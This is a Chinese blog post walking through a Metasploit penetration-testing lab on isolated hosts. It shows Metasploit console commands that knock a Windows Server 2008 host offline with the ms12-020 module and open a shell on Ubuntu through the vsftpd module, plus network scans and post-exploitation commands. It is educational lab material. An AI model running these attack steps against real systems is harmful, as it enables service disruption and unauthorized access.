网络安全: Kali Linux 使用 MSF 渗透测试

2024-03-06 06:20

本文主要是介绍网络安全: Kali Linux 使用 MSF 渗透测试,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

一、实验

1.环境

2.登录MSF(Metasploit Framework)控制台

3.MSF初始化

4.MSF 管理工作区

5.Kali Linux (2024.1) 对Windows server 进行网址目录扫描

6.Kali Linux (2022.4) 对Ubuntu进行网址目录扫描

7.Kali Linux (2024.1) 对Windows server 进行DOS 

8.Windows server 安装补丁

9.Kali Linux (2022.4) 对Ubuntu 进行漏洞利⽤

二、问题

1.MSF常用模块与基础命令


一、实验

1.环境

(1)主机

表1  主机

系统版本IP备注
Kali Linux2024.1

192.168.204.146(动态)

192.168.204.100(静态)

Windows server2008 R2192.168.204.150Kali(2024.1)的目标主机
Kali Linux2022.4

192.168.204.154(动态)

Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机

(2)查看Kali Linux (2024.1)系统版本

cat /etc/os-release

(3)查看Kali Linux (2024.1)系统IP地址

ip addr

(4) 查看Windows server 2008 IP 地址

ipconfig

 (5)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(6) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(7)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a

ip addr

2.登录MSF(Metasploit Framework)控制台

(1)Kali Linux (2024.1)系统版本

msfconsole

启动

进入并退出

(2)Kali Linux (2022.4)系统版本

msfconsole

启动

进入并退出

3.MSF初始化

(1)Kali Linux (2024.1)系统版本

初始化数据库

msfdb init

开机自启动

systemctl enable postgresql --now

进入MSF 控制台

msfconsole

(2)Kali Linux (2022.4)系统版本

 初始化数据库

msfdb init

开机自启动

systemctl enable postgresql --now

进入MSF 控制台

msfconsole

4.MSF 管理工作区

(1)Kali Linux (2024.1)系统版本

 查看当前工作区

workspace

创建⼯作区 , ⾃动切换到新⼯作区

workspace  -a  cicd

切换到 default ⼯作区

workspace  default

删除⼯作区

workspace  -d  cicd

扫描Windows server数据

db_nmap 192.168.204.150

(2)Kali Linux (2022.4)系统版本

查看当前工作区

workspace

创建⼯作区 , ⾃动切换到新⼯作区

workspace  -a  devops

切换到 default ⼯作区

workspace  default

删除⼯作区

workspace  -d  devops

 扫描Ubuntu数据

db_nmap 192.168.204.143

5.Kali Linux (2024.1) 对Windows server 进行网址目录扫描

(1) 搜索 dir_scan 脚本

search dir_scan 

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.150

(4)运⾏脚本

run 

6.Kali Linux (2022.4) 对Ubuntu进行网址目录扫描

 (1) 搜索 dir_scan 脚本

search dir_scan 

 (2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.143

(4)运⾏脚本

run 

 7.Kali Linux (2024.1) 对Windows server 进行DOS 

(1) 搜索 dir_scan 脚本

search ms12-020

(2) 使⽤编号为 1 的脚本

use 1

(3) 设置⽬标主机

 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run 

查看Windows server状态

8.Windows server 安装补丁

(1)Windows 补丁查询

Microsoft Update Catalog

(2)搜索

ms12-020

(3)安装补丁

重启

 (4)Kali Lnux (2024.1) 使用MSF运⾏脚本

run 

(5)Windows server

保持正常

9.Kali Linux (2022.4) 对Ubuntu 进行漏洞利⽤

(1) 查看目标主机

先返回

back

目标主机为192.168.204.143

db_nmap -sP 192.168.204.0/24

扫描开放端口

db_nmap -sV 192.168.204.143

21端口已打开

 (2) 搜索 vsftpd 脚本

search vsftpd

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.143

(4)运⾏脚本

run 

//查看当前目录
pwd//查看当前用户
whoami

//查看端口
netstat -antlp | grep 80//查看进程
ps -elf | grep sshd

退出

exit

二、问题

1.MSF常用模块与基础命令

(1)模块

1)Auxiliary 辅助
⼀般负责执⾏扫描、嗅探、指纹识别、爆破等相关功能以辅助攻击,不直接在测试机和⽬标机之间建立访问。2)Exploit 漏洞利⽤
利⽤发现的安全漏洞或配置弱点对远程⽬标进⾏攻击,以植入和运⾏攻击载荷。3)Payloads 载荷
⽬标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透⽬标后,⽤于在⽬标系统上运⾏任意命令或者执⾏特定代码。4)Post 后渗透
在取得⽬标的远程控制权以后,可以进⼀步实施的攻击动作,如获取敏感信息、实施跳板攻击等。

(2)命令

?            //获取帮助
? show       //查看show指令的帮助
search       //搜索模块
use          //使⽤模块
set          //设置模块选项
run          //运⾏当前模块
options      //列出当前模块的选项
show         //查看模块或相关信息
back         //返回上⼀步
exit/quit    //退出

这篇关于网络安全: Kali Linux 使用 MSF 渗透测试的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/779095

相关文章

使用Dify访问mysql数据库详细代码示例

《使用Dify访问mysql数据库详细代码示例》:本文主要介绍使用Dify访问mysql数据库的相关资料,并详细讲解了如何在本地搭建数据库访问服务,使用ngrok暴露到公网,并创建知识库、数据库访... 1、在本地搭建数据库访问的服务,并使用ngrok暴露到公网。#sql_tools.pyfrom

使用mvn deploy命令上传jar包的实现

《使用mvndeploy命令上传jar包的实现》本文介绍了使用mvndeploy:deploy-file命令将本地仓库中的JAR包重新发布到Maven私服,文中通过示例代码介绍的非常详细,对大家的学... 目录一、背景二、环境三、配置nexus上传账号四、执行deploy命令上传包1. 首先需要把本地仓中要

Spring Cloud之注册中心Nacos的使用详解

《SpringCloud之注册中心Nacos的使用详解》本文介绍SpringCloudAlibaba中的Nacos组件,对比了Nacos与Eureka的区别,展示了如何在项目中引入SpringClo... 目录Naacos服务注册/服务发现引⼊Spring Cloud Alibaba依赖引入Naco编程s依

Java springBoot初步使用websocket的代码示例

《JavaspringBoot初步使用websocket的代码示例》:本文主要介绍JavaspringBoot初步使用websocket的相关资料,WebSocket是一种实现实时双向通信的协... 目录一、什么是websocket二、依赖坐标地址1.springBoot父级依赖2.springBoot依赖

Linux下修改hostname的三种实现方式

《Linux下修改hostname的三种实现方式》:本文主要介绍Linux下修改hostname的三种实现方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux下修改ho编程stname三种方式方法1:修改配置文件方法2:hFvEWEostnamectl命

Java使用Mail构建邮件功能的完整指南

《Java使用Mail构建邮件功能的完整指南》JavaMailAPI是一个功能强大的工具,它可以帮助开发者轻松实现邮件的发送与接收功能,本文将介绍如何使用JavaMail发送和接收邮件,希望对大家有所... 目录1、简述2、主要特点3、发送样例3.1 发送纯文本邮件3.2 发送 html 邮件3.3 发送带

Linux虚拟机不显示IP地址的解决方法(亲测有效)

《Linux虚拟机不显示IP地址的解决方法(亲测有效)》本文主要介绍了通过VMware新装的Linux系统没有IP地址的解决方法,主要步骤包括:关闭虚拟机、打开VM虚拟网络编辑器、还原VMnet8或修... 目录前言步骤0.问题情况1.关闭虚拟机2.China编程打开VM虚拟网络编辑器3.1 方法一:点击还原VM

使用DeepSeek搭建个人知识库(在笔记本电脑上)

《使用DeepSeek搭建个人知识库(在笔记本电脑上)》本文介绍了如何在笔记本电脑上使用DeepSeek和开源工具搭建个人知识库,通过安装DeepSeek和RAGFlow,并使用CherryStudi... 目录部署环境软件清单安装DeepSeek安装Cherry Studio安装RAGFlow设置知识库总

Linux搭建Mysql主从同步的教程

《Linux搭建Mysql主从同步的教程》:本文主要介绍Linux搭建Mysql主从同步的教程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录linux搭建mysql主从同步1.启动mysql服务2.修改Mysql主库配置文件/etc/my.cnf3.重启主库my

Python FastAPI入门安装使用

《PythonFastAPI入门安装使用》FastAPI是一个现代、快速的PythonWeb框架,用于构建API,它基于Python3.6+的类型提示特性,使得代码更加简洁且易于绶护,这篇文章主要介... 目录第一节:FastAPI入门一、FastAPI框架介绍什么是ASGI服务(WSGI)二、FastAP